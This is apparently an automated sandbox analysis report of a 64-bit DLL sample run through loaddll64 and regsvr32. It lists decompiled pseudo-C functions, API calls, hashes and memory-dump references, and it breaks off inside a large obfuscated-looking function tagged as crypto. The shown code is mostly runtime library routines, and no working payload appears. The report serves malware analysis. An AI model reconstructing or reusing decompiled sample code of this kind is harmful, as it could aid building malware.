				if (( *( *((intOrPtr*)(0x146df940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x1467157a;
				if ( *_t230 == 0x1a) goto 0x14671599;
				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
				 *((char*)(_t186 + 0x38)) = 1;
				goto 0x146712fb;
				goto 0x1467159b;
				return 0;
			}

0x7ffd1467129c
0x7ffd146712b2
0x7ffd146712b8
0x7ffd146712bb
0x7ffd146712c1
0x7ffd146712ca
0x7ffd146712cc
0x7ffd146712d1
0x7ffd146712d4
0x7ffd146712da
0x7ffd146712e1
0x7ffd146712e9
0x7ffd146712ec
0x7ffd146712f1
0x7ffd146712f6
0x7ffd146712fe
0x7ffd14671313
0x7ffd14671317
0x7ffd1467131b
0x7ffd1467132e
0x7ffd14671337
0x7ffd1467133f
0x7ffd14671346
0x7ffd1467134a
0x7ffd14671352
0x7ffd14671368
0x7ffd14671377
0x7ffd14671381
0x7ffd14671386
0x7ffd146713a1
0x7ffd146713a3
0x7ffd146713ac
0x7ffd146713c7
0x7ffd146713d0
0x7ffd146713d6
0x7ffd146713dd
0x7ffd146713e3
0x7ffd146713e7
0x7ffd146713eb
0x7ffd146713f1
0x7ffd14671401
0x7ffd14671405
0x7ffd1467140a
0x7ffd14671411
0x7ffd14671413
0x7ffd14671416
0x7ffd1467141d
0x7ffd14671431
0x7ffd14671433
0x7ffd14671435
0x7ffd14671441
0x7ffd14671447
0x7ffd1467144f
0x7ffd14671452
0x7ffd14671457
0x7ffd1467145a
0x7ffd14671469
0x7ffd1467146e
0x7ffd14671475
0x7ffd1467148e
0x7ffd14671492
0x7ffd14671495
0x7ffd1467149a
0x7ffd1467149f
0x7ffd146714a5
0x7ffd146714b2
0x7ffd146714b7
0x7ffd146714b9
0x7ffd146714c6
0x7ffd146714cb
0x7ffd146714cd
0x7ffd146714da
0x7ffd146714df
0x7ffd146714ec
0x7ffd146714ef
0x7ffd146714f7
0x7ffd146714fb
0x7ffd14671506
0x7ffd14671508
0x7ffd1467150e
0x7ffd14671514
0x7ffd14671519
0x7ffd14671533
0x7ffd14671535
0x7ffd1467153a
0x7ffd1467153f
0x7ffd14671541
0x7ffd14671545
0x7ffd1467154c
0x7ffd14671550
0x7ffd14671553
0x7ffd1467155b
0x7ffd1467155e
0x7ffd14671563
0x7ffd14671572
0x7ffd14671578
0x7ffd1467157a
0x7ffd1467157e
0x7ffd14671582
0x7ffd14671589
0x7ffd1467158d
0x7ffd14671597
0x7ffd146715ab

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFD1467123C), ref: 00007FFD146713BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFD1467123C), ref: 00007FFD14671449

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction ID: cedf2eea7bff15a1e6d807d6856b11e3e3c71f94a8daa3caeb11b651133e4867
Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction Fuzzy Hash: 0991DCB2B18E52C9FB508F7594E02FD27A2AB07BADF448136DE4E57798CE38D4858710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661CE0 Relevance: 6.1, APIs: 4, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E00007FFD7FFD14661CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr _t62;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFD7FFD14662250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x14661d3a;
				E00007FFD7FFD146618F0(__rax, _a8);
				_t48 = _a16 - __rax;
				E00007FFD7FFD14661DF0(_t48, _a8, _a8, _t48, _a24);
				goto 0x14661de7;
				E00007FFD7FFD14662170(_t48, _a8);
				_t62 =  *0x146da228; // 0xffffffffffffffff
				_t50 = _t62 -  *_t48;
				if (_t50 - _a24 > 0) goto 0x14661d65;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170(_t50, _a8);
				_t52 =  *_t50 + _a24;
				_v24 = _t52;
				if (_a24 <= 0) goto 0x14661de2;
				r8d = 0;
				if ((E00007FFD7FFD146622B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x14661de2;
				E00007FFD7FFD146618F0(_t52, _a8);
				_v16 = _t52;
				E00007FFD7FFD14662170(_t52, _a8);
				E00007FFD7FFD146611E0(_v16 +  *_t52, _a16, _a24);
				return E00007FFD7FFD146623A0(_v16 +  *_t52, _a8, _v24);
			}

0x7ffd14661ce0
0x7ffd14661ce5
0x7ffd14661cea
0x7ffd14661d07
0x7ffd14661d0e
0x7ffd14661d1b
0x7ffd14661d30
0x7ffd14661d35
0x7ffd14661d3f
0x7ffd14661d47
0x7ffd14661d51
0x7ffd14661d59
0x7ffd14661d60
0x7ffd14661d6a
0x7ffd14661d72
0x7ffd14661d77
0x7ffd14661d82
0x7ffd14661d84
0x7ffd14661d9b
0x7ffd14661da2
0x7ffd14661da7
0x7ffd14661db1
0x7ffd14661dce
0x7ffd14661deb

APIs

Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466226B
Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661D0E

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Part of subcall function 00007FFD14661DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14661E56
Part of subcall function 00007FFD14661DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661E98
Part of subcall function 00007FFD14661DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661EAC
Part of subcall function 00007FFD14661DF0: char_traits.LIBCPMTD ref: 00007FFD14661EDB

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14661D60
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661DA2
char_traits.LIBCPMTD ref: 00007FFD14661DCE

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
String ID:
API String ID: 3922470843-0
Opcode ID: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
Instruction ID: 8546c4218f43c7e00c8442cc2609c1fda73855601fc7dc6533be33b8b39b4c96
Opcode Fuzzy Hash: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
Instruction Fuzzy Hash: 4E21A72271CE8581EB50EB66E4A11AEB370FBC77E8F504436EB8D47B59CE6DD5008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661DF0 Relevance: 6.1, APIs: 4, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFD7FFD14661DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t44;
				intOrPtr* _t49;
				intOrPtr* _t51;
				long long _t53;
				intOrPtr* _t54;
				intOrPtr _t61;

				_t49 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD146621F0(_t44, __rax, _a16, _a24);
				E00007FFD7FFD14662400(_t44, __rax, _a16, _a24, _a32);
				_a32 = _t49;
				E00007FFD7FFD14662170(_t49, _a8);
				_t61 =  *0x146da228; // 0xffffffffffffffff
				_t51 = _t61 -  *_t49;
				if (_t51 - _a32 > 0) goto 0x14661e5b;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170(_t51, _a8);
				_t53 =  *_t51 + _a32;
				_v40 = _t53;
				if (_a32 <= 0) goto 0x14661eef;
				r8d = 0;
				if ((E00007FFD7FFD146622B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x14661eef;
				E00007FFD7FFD146618D0(_t53, _a16);
				_t54 = _t53 + _a24;
				_v24 = _t54;
				E00007FFD7FFD146618F0(_t54, _a8);
				_v32 = _t54;
				E00007FFD7FFD14662170(_t54, _a8);
				E00007FFD7FFD146611E0(_v32 +  *_t54, _v24, _a32);
				return E00007FFD7FFD146623A0(_v32 +  *_t54, _a8, _v40);
			}

0x7ffd14661df0
0x7ffd14661df0
0x7ffd14661df5
0x7ffd14661dfa
0x7ffd14661dff
0x7ffd14661e12
0x7ffd14661e26
0x7ffd14661e2b
0x7ffd14661e35
0x7ffd14661e3d
0x7ffd14661e47
0x7ffd14661e4f
0x7ffd14661e56
0x7ffd14661e60
0x7ffd14661e68
0x7ffd14661e6d
0x7ffd14661e78
0x7ffd14661e7a
0x7ffd14661e91
0x7ffd14661e98
0x7ffd14661e9d
0x7ffd14661ea2
0x7ffd14661eac
0x7ffd14661eb1
0x7ffd14661ebb
0x7ffd14661edb
0x7ffd14661ef8

APIs

Part of subcall function 00007FFD146621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14662217

Part of subcall function 00007FFD14662170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14661E56
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661E98
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661EAC
char_traits.LIBCPMTD ref: 00007FFD14661EDB

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 3679362534-0
Opcode ID: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
Instruction ID: 8fd1fd87e1111bf5fef8abdc8c5b98187f398148fb4dec1c90f75c8ed0853c9a
Opcode Fuzzy Hash: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
Instruction Fuzzy Hash: 70218F7671CF8581EB10EB66F4A11AEA761FBC67E4F000035EA8D47B69CE7CD5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14671004 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FFD7FFD14671004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				void* __rdi;
				void* __rsi;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				intOrPtr* _t74;
				intOrPtr* _t76;
				void* _t84;
				void* _t88;
				signed short* _t89;
				void* _t91;
				void* _t94;
				signed short* _t97;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t106;
				void* _t107;

				_t97 = __r8;
				_t76 = __rcx;
				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFD7FFD14672DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
				_t62 =  *0x146de008; // 0xef3156171c50
				_a5176 = _t62 ^ _t94 - __rax;
				_t74 = _t76;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t107 = _t106 + _t97;
				_t89 = _t97;
				 *_t74 =  *((intOrPtr*)(0x146df940 + (__edx >> 6) * 8));
				 *((intOrPtr*)(_t74 + 8)) = 0;
				if (_t97 - _t107 >= 0) goto 0x14671145;
				_t67 =  &_a40;
				if (_t89 - _t107 >= 0) goto 0x146710ae;
				_t41 =  *_t89 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x1467109a;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x1467107c;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FFD7FFD1466D698();
				if (0 == 0) goto 0x1467113d;
				if (0 == 0) goto 0x1467112d;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x1467113d;
				if (0 + _a24 < 0) goto 0x146710fa;
				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
				goto 0x14671071;
				 *_t74 = GetLastError();
				return E00007FFD7FFD14663A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
			}

0x7ffd14671004
0x7ffd14671004
0x7ffd14671004
0x7ffd14671009
0x7ffd1467101b
0x7ffd14671023
0x7ffd1467102d
0x7ffd14671038
0x7ffd1467103e
0x7ffd1467104c
0x7ffd14671050
0x7ffd14671056
0x7ffd14671068
0x7ffd1467106e
0x7ffd14671071
0x7ffd14671077
0x7ffd1467107f
0x7ffd14671081
0x7ffd1467108c
0x7ffd14671093
0x7ffd14671096
0x7ffd1467109a
0x7ffd146710ac
0x7ffd146710ae
0x7ffd146710b9
0x7ffd146710c7
0x7ffd146710da
0x7ffd146710df
0x7ffd146710e9
0x7ffd146710f2
0x7ffd146710f8
0x7ffd146710fa
0x7ffd1467110f
0x7ffd14671118
0x7ffd14671123
0x7ffd1467112b
0x7ffd14671132
0x7ffd14671138
0x7ffd14671143
0x7ffd14671173

APIs

WriteFile.KERNEL32 ref: 00007FFD1467111B
GetLastError.KERNEL32 ref: 00007FFD1467113D

Strings

U, xrefs: 00007FFD146710C7

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction ID: fe71571a13106964c18d66c0e2dd1b1b52a1ccfcd089e806359ed944592294e5
Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction Fuzzy Hash: 02419322B18A81C5EB208F35E4A43E967A1FB9A7E8F448032EE4D87798DF3CD441C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14672EB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD14672EB4(intOrPtr* __rcx) {
				void* __rbx;
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t3 = E00007FFD7FFD14666B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x14672ed5;
				if ( *__rcx != 0xe06d7363) goto 0x14672ed5;
				if (_t3 == 1) goto 0x14672edb;
				return _t3;
			}

0x7ffd14672ebd
0x7ffd14672ec6
0x7ffd14672ece
0x7ffd14672ed3
0x7ffd14672eda

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFD14672EBD

Part of subcall function 00007FFD14666B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFD14666C0C
Part of subcall function 00007FFD14666B4C: RtlUnwindEx.KERNEL32 ref: 00007FFD14666C5B

Strings

csm, xrefs: 00007FFD14672EC8
f, xrefs: 00007FFD14672EC2

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 1396615161-629598281
Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction ID: d76b0c45538e055d49375a7f15c87701c6d404849ac9542eaa37bb18b85383ec
Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction Fuzzy Hash: B6D0A751F0854785FB39277110E52F806944F5F73EF28C430C968042C7AF1D98E04601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14673ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FFD14673F22
RegisterClassExW.USER32 ref: 00007FFD14673F59

Strings

P, xrefs: 00007FFD14673ED9

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction ID: 73fb338376220491ca5271b5ffaef4f46dabb82a38832827fd20dc6f954c2a63
Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction Fuzzy Hash: 1701A472529F8086E7608F10F49435BB7B4F785758F600129E6CD46B68DFBDD158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466472C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466472C(void* __eflags, void* __rax) {
				char _v40;
				void* _t6;
				void* _t11;
				void* _t12;
				char* _t14;
				void* _t16;

				E00007FFD7FFD146645C0(__rax,  &_v40);
				_t14 =  &_v40;
				_t6 = E00007FFD7FFD14666E00(_t12, _t14, 0x146dcbd8, _t16);
				asm("int3");
				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
				return _t6;
			}

0x7ffd14664735
0x7ffd14664741
0x7ffd14664746
0x7ffd1466474b
0x7ffd14664758
0x7ffd1466475d

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFD14664735
_CxxThrowException.LIBVCRUNTIME ref: 00007FFD14664746

Part of subcall function 00007FFD14666E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFD1466472B), ref: 00007FFD14666E7D
Part of subcall function 00007FFD14666E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFD1466472B), ref: 00007FFD14666EBC

Strings

Unknown exception, xrefs: 00007FFD14664751

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction ID: 7e71549b880d41f1e6517efe6b9e5622559cd2390e78272d430c0da029b8d586
Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction Fuzzy Hash: E6D01722B28E8695EE10DB20E8E03E86331FB8372CF904532E14D815B5DF2CDA4AC380

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 3360, Parent PID: 5144COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	0%
Total number of Nodes:	899
Total number of Limit Nodes:	7

Executed Functions

Function 00007FFD14673FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FFD7FFD14673FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
				signed int _v24;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
